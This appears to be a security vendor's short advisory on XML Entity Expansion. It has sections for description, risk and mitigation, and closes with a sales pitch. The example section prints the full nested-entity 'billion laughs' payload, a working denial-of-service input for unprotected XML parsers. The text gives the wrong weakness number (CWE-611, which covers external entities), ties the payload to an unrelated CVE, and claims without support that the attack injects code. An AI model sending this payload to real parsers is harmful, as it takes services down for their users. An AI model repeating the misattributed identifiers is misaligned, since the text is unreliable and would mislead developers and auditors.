Availability / XML Entity Expansion

Web and API

Description

XML Entity Expansion (CWE-611) is a form of attack that involves an attacker sending malicious XML input to an XML parser, which then causes the parser to consume an excessive amount of resources (CPU, memory, etc.). This can result in a denial of service (DoS) attack, which can disrupt the availability of the application or website. It can also be used to inject malicious code into the application or website. According to the OWASP Testing Guide, XML Entity Expansion is often used in combination with XML External Entity (XXE) attacks.

Risk

XML Entity Expansion can have serious consequences for the availability of a web application or website. By consuming excessive resources, the attacker is able to deny service to legitimate users, resulting in disruption of the application or website. Furthermore, it can be used to inject malicious code into the application or website, which can lead to further disruption and data loss.

Solution

XML Entity Expansion can be mitigated by limiting the size and number of XML entities, or by disabling external entities. Additionally, XML parsers should be configured to reject documents with excessive entities.

Example

The following example code illustrates an XML Entity Expansion attack, taken from CVE-2016-7117.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

Curious? Convinced? Interested?

Arrange a no-obligation consultation with one of our product experts today.